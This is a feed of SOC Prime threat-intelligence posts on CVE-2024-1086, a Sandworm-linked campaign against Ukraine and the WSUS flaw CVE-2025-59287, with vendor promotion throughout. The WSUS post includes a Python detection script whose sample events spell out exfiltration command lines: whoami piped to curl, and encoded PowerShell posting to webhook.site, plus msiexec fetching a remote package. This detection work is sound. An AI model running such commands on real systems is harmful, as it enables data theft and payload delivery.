The emergence of SesameOp, a backdoor that uniquely exploits the OpenAI API as a C2 channel to covertly coordinate malicious activity, reflects the trend of increasingly sophisticated tactics employed by threat actors. By relying on SOC Prime’s AI-Native Detection Intelligence Platform for SOC teams, which provides real-time, cross-platform detection intelligence to anticipate, detect, validate, and respond to cyber threats faster and more effectively, global organizations can build a resilient cybersecurity ecosystem and preempt attacks that matter most.



The post SesameOp Backdoor Detection: Microsoft Discovers New Malware Abusing OpenAI Assistants API in Cyber-Attacks appeared first on SOC Prime.

CVE-2024-1086 Vulnerability: Critical Privilege Escalation Flaw in Linux Kernel Exploited in the Ransomware Attacks

4 de Novembro de 2025, 09:34
CVE-2024-1086 Vulnerability

Immediately after reports of CVE-2025-59287, a critical RCE flaw in WSUS systems, being exploited in the wild, another high-severity Linux kernel flaw has been observed being actively weaponized in ransomware attacks. CISA confirmed its exploitation and warned that abusing CVE-2024-1086 in offensive campaigns allows attackers with local access to gain root privileges on affected systems.

For the third year running, exploited vulnerabilities remain the most common technical root cause of ransomware attacks, involved in 32% of incidents, according to The State of Ransomware 2025 report by Sophos. Ransomware groups are increasingly leveraging software flaws as a primary entry point into enterprise systems, while social engineering and stolen credentials continue to play a major role in attacks. With over 40,000 new vulnerabilities logged by NIST this year, organizations face a growing challenge, as proactively identifying and fixing these flaws is essential to reducing the attack surface and defending against increasingly sophisticated ransomware threats.

Sign up for the SOC Prime Platform to access the global active threats feed, which offers real-time cyber threat intelligence and curated detection algorithms to address emerging threats. All the rules are compatible with multiple SIEM, EDR, and Data Lake formats and mapped to the MITRE ATT&CK® framework. Additionally, each rule is enriched with CTI links, attack timelines, audit configurations, triage recommendations, and more relevant context. Press the Explore Detections button to see the entire detection stack for proactive defense against critical vulnerabilities filtered by the “CVE” tag.

Explore Detections

Additionally, cyber defenders can bulletproof their defenses with a curated detection stack addressing ransomware attacks. Just search for relevant detection content in the Threat Detection Marketplace using the “Ransomware” tag.

Security engineers can also leverage Uncoder AI, an IDE and co-pilot for detection engineering. With Uncoder, defenders can instantly convert IOCs into custom hunting queries, craft detection code from raw threat reports, generate Attack Flow diagrams, enable ATT&CK tags prediction, leverage AI-driven query optimization, and translate detection content across multiple platforms.

CVE-2024-1086 Analysis

CISA has recently released an urgent warning about a critical Linux kernel flaw, identified as CVE-2024-1086. This use-after-free bug (with a CVSS score of 7.8), hidden within the netfilter: nf_tables component, allows adversaries with local access to gain root privileges on affected systems, potentially leading to arbitrary code execution or ransomware deployment that could severely disrupt enterprise systems worldwide.

The flaw was disclosed and patched in January 2024, though it originated from code introduced back in 2014. It was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on May 30, 2024, and in late October 2025, CISA issued a notification confirming that the vulnerability is known to be actively used in ransomware campaigns. Notably, a proof-of-concept (PoC) exploit for the flaw has been available since March 2024, when a researcher using the alias “Notselwyn” published a CVE-2024-1086 PoC on GitHub, demonstrating local privilege escalation on Linux kernels from 5.14 through 6.6.

Exploiting this vulnerability, attackers can bypass security controls, gain administrative access, and move laterally across networks. Once root privileges are obtained, ransomware operators can disable endpoint protections, encrypt critical files, exfiltrate sensitive data, and establish persistent access.

The netfilter subsystem, responsible for packet filtering and network address translation, makes this vulnerability particularly valuable for attackers seeking to manipulate network traffic or weaken security mechanisms. Typically, CVE-2024-1086 is exploited after adversaries gain an initial foothold through phishing, stolen credentials, or internet-facing vulnerabilities, turning limited user access into full administrative control.

CISA’s classification of CVE-2024-1086 as a vulnerability “known to be used in ransomware campaigns” underscores its severity and the urgent need for organizations to verify patch deployment and implement mitigating controls across Linux environments.

As a potential CVE-2024-1086 mitigation measure, the vendor advises disabling namespace creation for unprivileged users. To turn it off temporarily, running sudo sysctl -w kernel.unprivileged_userns_clone=0 is recommended, while executing echo kernel.unprivileged_userns_clone=0 | sudo tee /etc/sysctl.d/99-disable-unpriv-userns.conf makes the change persistent across reboots (this sysctl is present on Debian- and Ubuntu-patched kernels; other distributions expose different controls for unprivileged user namespaces).

Enhancing proactive cyber defense strategies is crucial for organizations to effectively and promptly reduce the risks of vulnerability exploitation. By leveraging SOC Prime’s complete product suite for enterprise-ready security protection backed by top cybersecurity expertise and AI, global organizations can future-proof cyber defense and strengthen their cybersecurity posture. 



The post CVE-2024-1086 Vulnerability: Critical Privilege Escalation Flaw in Linux Kernel Exploited in the Ransomware Attacks appeared first on SOC Prime.

Detect russian Attacks Targeting Ukraine: Hackers Apply the Custom Sandworm-Linked Webshell and Living-off-the-Land Tactics for Persistence

31 de Outubro de 2025, 13:50
Detect russian Attacks Targeting Ukraine

Since the start of the full-scale war in Ukraine, russia-backed hacking collectives have intensified their malicious activity against Ukraine and its allies on the cyber front line to conduct espionage operations and cripple critical systems. For instance, the nefarious Sandworm APT group (aka UAC-0082, UAC-0145, APT44) has been attacking Ukrainian organizations for over a decade, primarily targeting government agencies and the critical infrastructure sector.

Symantec and Carbon Black researchers have recently uncovered a two-month-long campaign targeting a major business services company in Ukraine and a separate week-long attack against a local state body. Notably, attackers primarily relied on Living-off-the-Land (LotL) techniques and dual-use tools to achieve persistent access.

Detect Latest Attacks Against Ukraine by russian Hackers

Cyber defenders are facing growing pressure as russian threat actors evolve their tactics and sharpen their stealth capabilities. Since the beginning of the war in Ukraine, these state-backed APT groups have intensified operations, exploiting the conflict to experiment with and refine cutting-edge cyberattack strategies. This activity has a global impact, as russia-linked actors now rank second worldwide among APT attack sources, according to the ESET APT Activity Report for Q4 2024–Q1 2025.

Register for the SOC Prime Platform to detect potential russian APT attacks at the earliest stage possible. Click the Explore Detections button below to access a curated stack of detection rules designed to identify and respond to the most recent campaign leveraging LotL tactics, dual-use tools, and a custom Sandworm-linked webshell to target Ukrainian organizations.

Explore Detections

Alternatively, cyber defenders can search for relevant detection content right in the Threat Detection Marketplace by using the “Sandworm” or “Seashell Blizzard” tags.

All the rules in the SOC Prime Platform are compatible with multiple SIEM, EDR, and Data Lake solutions and are mapped to the MITRE ATT&CK® framework. Additionally, each rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.

Additionally, security experts can streamline threat investigation using Uncoder AI, a private IDE & co-pilot for threat-informed detection engineering. Generate detection algorithms from raw threat reports, enable fast IOC sweeps, predict ATT&CK tags, optimize query code with AI tips, and translate it across multiple SIEM, EDR, and Data Lake languages. For instance, security professionals can use Symantec and Carbon Black’s most recent report to generate an Attack Flow diagram in several clicks.

Use Uncoder AI to visualize an attack flow of new stealthy russia-backed campaigns against Ukraine based on the Symantec and Carbon Black Threat Hunter Team report.

Ukraine Attacked by russian Hackers: The Latest Campaign Analysis

The russia-linked threat actors have been launching intensive attacks on Ukrainian organizations since the onset of russia’s full-scale invasion. The Symantec and Carbon Black Threat Hunting team has recently identified a persistent two-month-long campaign compromising a major business services company and a week-long intrusion into a local state entity. Both campaigns apparently intended to collect sensitive data and maintain persistent network access. Instead of deploying large-scale malware, the adversaries primarily used LotL techniques and dual-use tools to operate stealthily within the environments. 

Adversaries infiltrated the business services company by installing webshells on publicly accessible servers, likely by exploiting unpatched vulnerabilities. Among the tools used was Localolive, a custom webshell previously linked by Microsoft to a Sandworm subgroup (also known as Seashell Blizzard) and observed in an earlier long-running Sandworm intrusion campaign codenamed BadPilot to establish initial access. 

Sandworm APT, associated with Russia’s GRU military intelligence, is notorious for espionage and destructive operations. The group has been linked to malicious operations targeting Ukraine’s power grid, the VPNFilter attacks against routers, and the AcidRain wiper campaign against Viasat satellite modems, and is also known for targeting IoT devices. In February 2025, the group was behind another long-term campaign active since 2023, in which adversaries employed trojanized Microsoft Key Management Service (KMS) activators and fake Windows updates to compromise Ukrainian systems.

Malicious activity at the targeted organization began in late June 2025, when attackers attempted to install a webshell from a remote IP address. After gaining access, they executed a series of reconnaissance commands (whoami, systeminfo, tasklist, net group) to map the environment. They then disabled Windows Defender scans for the Downloads folder, suggesting admin-level privileges, and created a scheduled task to perform periodic memory dumps, likely to extract credentials. 

Two days later, a second webshell was deployed, followed by additional network reconnaissance. Activity later spread to other systems. On the second computer, adversaries searched for Symantec software, listed files, and checked for KeePass processes, indicating an attempt to access stored passwords. Subsequent actions included more memory dumps (using rdrleakdiag), reconfiguration of Windows Defender, and the execution of suspicious binaries, such as service.exe and cloud.exe, whose names resembled webshells used elsewhere in the intrusion. Another notable aspect of the intrusion was the use of a legitimate MikroTik router management tool (winbox64.exe), which the attackers placed in the Downloads folder of the affected systems. Notably, CERT-UA also reported the use of winbox64.exe in April 2024, linking it to a Sandworm campaign aimed at disrupting the information and communication technology (ICT) systems of the energy, water, and heat supply sector across 20 organizations in Ukraine.

While defenders found no direct evidence linking the recent intrusions to Sandworm, they assessed that the operations appeared to originate from russia. The investigation further revealed the use of multiple PowerShell backdoors and suspicious executables likely representing malware, though none of these samples have yet been recovered for analysis.

Adversaries displayed deep expertise with native Windows tools, proving how a skilled operator can escalate activity and exfiltrate sensitive information, including credentials, while remaining on the network with almost no visible traces. As potential mitigation measures to reduce the risks of russian-backed attacks, defenders recommend applying the Symantec Protection Bulletin.

With the increasing attempts of russia-backed hacking collectives to compromise Ukraine and its allies, organizations should be ready to thwart such stealthy threats before they escalate into attacks. By relying on SOC Prime’s complete product suite backed by AI, automation, and real-time threat intelligence, security teams can preempt cyber-attacks of any sophistication and fortify the organization’s defenses. Exclusively for MDE customers, SOC Prime also curates a Bear Fence pack to enable automated threat hunting for APT28 and 48 more russian state-sponsored actors, letting teams automatically hunt for Fancy Bear and its siblings through an exclusive Attack Detective scenario using 242 hand-picked behavior rules, over 1 million IOCs, and a dynamic AI-driven TTP feed.



The post Detect russian Attacks Targeting Ukraine: Hackers Apply the Custom Sandworm-Linked Webshell and Living-off-the-Land Tactics for Persistence appeared first on SOC Prime.

CVE-2025-59287 Detection: A Critical Unauthenticated RCE Vulnerability in Microsoft WSUS Under Active Exploitation

30 de Outubro de 2025, 10:46
CVE-2025-59287 Detection

Following the recent Tomcat RCE vulnerability disclosures (CVE-2025-55752 and CVE-2025-55754), researchers have identified another critical RCE flaw in Microsoft Windows Server Update Services (WSUS) systems. The vulnerability tracked as CVE-2025-59287 permits remote adversaries to execute code on affected systems and is currently leveraged in in-the-wild attacks, with a PoC exploit publicly available. 

Detect CVE-2025-59287 Exploitation Attempts

With more than 1.4 billion devices powered by Windows and millions of organizations relying on Azure and Microsoft 365, Microsoft technologies form the backbone of today’s digital world. According to the 2025 BeyondTrust Microsoft Vulnerabilities Report, a record 1,360 security vulnerabilities were reported across Microsoft products in 2024, an 11% rise compared to the previous high. This surge highlights how rapidly the attack surface continues to expand and reinforces the need for organizations to stay proactive as cyber threats evolve.

The recently identified CVE-2025-59287 vulnerability in Microsoft WSUS is a clear example of this growing trend, reminding security teams that proactive defense is essential in staying ahead of modern threats.

Register now for the SOC Prime Platform to access an extensive collection of curated detection content and AI-native threat intelligence, helping your team outscale offensive campaigns exploiting CVE-2025-59287. Press the Explore Detections button below to immediately drill down to a relevant detection stack.

Explore Detections

For a broader range of SOC content for vulnerability exploit detection, security engineers can also apply the “CVE” tag.

All the rules are compatible with multiple SIEM, EDR, and Data Lake formats and mapped to the MITRE ATT&CK® framework. Additionally, each rule is enriched with CTI links, attack timelines, audit configurations, triage recommendations, and more relevant context.

Security engineers can also leverage Uncoder AI, an IDE and co-pilot for detection engineering. With Uncoder, defenders can instantly convert IOCs into custom hunting queries, craft detection code from raw threat reports, generate Attack Flow diagrams, enable ATT&CK tags prediction, leverage AI-driven query optimization, and translate detection content across multiple platforms. For instance, cyber defenders can generate the Attack Flow diagram based on Bitdefender’s latest research in seconds.

Visualize the CVE-2025-59287 exploitation attack flow using Uncoder AI and based on Bitdefender’s latest research.

CVE-2025-59287 Analysis

Defenders have recently uncovered a novel campaign targeting vulnerable Windows Server Update Services (WSUS). Microsoft has released an out-of-band security update to address the new flaw behind RCE attacks that is being actively exploited in the wild, with a public PoC exploit already available.

The flaw, tracked as CVE-2025-59287 with a CVSS score of 9.8, is a critical RCE vulnerability. Although initially patched during last week’s Patch Tuesday, the vendor issued an additional update following evidence of real-world exploitation.

The flaw results from improper deserialization of untrusted data within WSUS. If exploited successfully, this vulnerability enables unauthenticated, remote adversaries to run arbitrary code with the same privileges as the compromised WSUS process. Such access can be used to establish persistence, commonly by deploying a webshell, which in turn grants the attacker full interactive remote control over the affected system. 

The vulnerability lies in the WSUS component responsible for managing client authorization and reporting, specifically within the ClientWebService web service. When the server processes a specially crafted SOAP request, typically directed to an endpoint such as SyncUpdates, it attempts to decrypt and deserialize an attacker-supplied AuthorizationCookie object using the insecure .NET BinaryFormatter.

Attackers exploit CVE-2025-59287 by embedding a malicious object chain within the serialized payload. This chain leverages legitimate constructor calls that, during deserialization, trigger the execution of arbitrary code, such as spawning a command shell or downloading additional payloads. The only prerequisite for a successful attack is network access to the vulnerable WSUS instance, which is most often reachable over ports 8530 (HTTP) or 8531 (HTTPS), though configurations using 80 or 443 are also possible.

Threat actors have been observed exploiting the vulnerability to execute commands via w3wp.exe and wsusservice.exe processes, download multi-stage payloads, conduct reconnaissance, and establish persistent C2 channels. These intrusions appear to be part of pre-ransomware campaigns, where attackers automate initial access before transitioning to manual, human-operated attacks.

Notably, several incidents have been observed using the webhook[.]site as a makeshift C2 channel. Although the service is intended for developers to capture and inspect HTTP payloads, adversaries exploit its ease of use and disposable URLs to exfiltrate command output and confirm exploitation. The traffic generated this way often appears benign due to the domain’s widespread, trusted reputation, making it useful for stealthy post-exploitation signaling.

According to Bitdefender’s technical advisory, there can be four potential attack scenarios:

  • In the first one, adversaries leverage the compromised process to download two files via PowerShell for a primary payload delivery, an executable dcrsproxy.exe and a companion file (rcpkg.db). The chain shows w3wp.exe spawning cmd.exe, which runs the PowerShell download-and-execute commands. 
  • In the next scenario, adversaries run whoami through the worker process and pipe the output to curl, sending the result to a webhook[.]site URL to confirm the exploit and assess privileges for follow-on actions, such as privilege escalation or lateral movement. 
  • The third use case involves in-memory exfiltration, where an encoded PowerShell command is executed from the service process to run an in-memory exfiltration routine that gathers network details and posts them to a disposable webhook, thereby evading command-line detections. 
  • Finally, another attack scenario involves the use of DNS beaconing. Threat actors apply the IIS process to issue DNS lookups and to download and install a malicious MSI via msiexec, then gather system or network details to establish long-term C2 persistence.
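The four scenarios share telemetry that a detection rule can key on: a WSUS host process spawning a shell or installer, a webhook.site call-out, an encoded PowerShell command whose payload only becomes visible after decoding, and msiexec pulling a remote package. The triage routine below is an added example, not Bitdefender's or SOC Prime's detection content; its field names are an assumption modelled on Sysmon Event ID 1 / Security 4688 process-creation telemetry, the WsusService.exe install path is assumed, and every event and URL in it is constructed.

```python
"""Triage constructed process-creation events for the CVE-2025-59287
post-exploitation patterns (added example; events are constructed)."""
import base64
import re
from pathlib import PureWindowsPath

WSUS_HOST_PROCESSES = {"w3wp.exe", "wsusservice.exe"}
# Children a patch-management worker process has no business spawning.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe",
                       "curl.exe", "certutil.exe", "msiexec.exe"}
# powershell -e / -ec / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")
MARKER = "webhook.site"  # disposable endpoint abused to confirm exploitation


def basename(image):
    """Lower-case file name of a Windows image path ('' when absent)."""
    return PureWindowsPath(image).name.lower()


def decode_encoded_powershell(command_line):
    """Return the decoded script of an -EncodedCommand invocation, or None."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(event):
    """Return the list of findings for one event (empty when it looks benign)."""
    findings = []
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    if parent in WSUS_HOST_PROCESSES and child in SUSPICIOUS_CHILDREN:
        findings.append(f"wsus_child_process:{parent}->{child}")
    if MARKER in cmd.lower():
        findings.append("webhook_site_callout")
    decoded = decode_encoded_powershell(cmd)
    if decoded is not None:
        findings.append("encoded_powershell")
        if MARKER in decoded.lower():
            # Only visible after decoding: a command-line string match alone
            # misses the in-memory exfiltration scenario.
            findings.append("webhook_site_callout_in_decoded")
    if child == "msiexec.exe" and re.search(r"(?i)\bhttps?://", cmd):
        findings.append("msiexec_remote_package")
    return findings


def triage(events):
    """Map event index -> findings for every event that raised at least one."""
    return {i: f for i, f in ((i, triage_event(e)) for i, e in enumerate(events)) if f}


def _encode(script):
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
WSUS_SVC = r"C:\Program Files\Update Services\Service\WsusService.exe"  # assumed path
SAMPLE_EVENTS = [  # constructed; PLACEHOLDER-ID stands in for a disposable URL
    {"parent_image": W3WP, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": 'cmd.exe /c "whoami | curl -X POST https://webhook.site/PLACEHOLDER-ID -d @-"'},
    {"parent_image": WSUS_SVC, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _encode(
         "Invoke-RestMethod -Uri https://webhook.site/PLACEHOLDER-ID -Method Post -Body (ipconfig /all)")},
    {"parent_image": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs -p"},
    {"parent_image": W3WP, "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /i http://example.invalid/PLACEHOLDER.msi /quiet /norestart"},
]

if __name__ == "__main__":
    for index, findings in triage(SAMPLE_EVENTS).items():
        print(index, findings)
```

IIS worker processes on other application pools can legitimately spawn helpers, so scope the parent-process check to the WSUS pool and service in production rules.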

As the WSUS Server Role is not enabled by default on Windows servers, systems without it are not vulnerable; however, enabling the role on an unpatched server introduces risk. When the October 23, 2025 out-of-band update cannot be installed immediately, Microsoft recommends temporary CVE mitigations such as disabling the WSUS Server Role—though clients will stop receiving updates—or blocking inbound traffic to ports 8530 and 8531 at the host firewall to render WSUS inoperative, while stressing that applying the patch as soon as possible remains the safest course of action.

The rising frequency and impact of vulnerability exploitation emphasize the need for proactive security measures and adherence to best cybersecurity practices to enhance an organization’s defenses. SOC Prime’s complete product suite, backed by AI, automated capabilities, and real-time CTI, serves as the future-proof solution to help organizations outscale cyber threats they anticipate most.



The post CVE-2025-59287 Detection: A Critical Unauthenticated RCE Vulnerability in Microsoft WSUS Under Active Exploitation appeared first on SOC Prime.
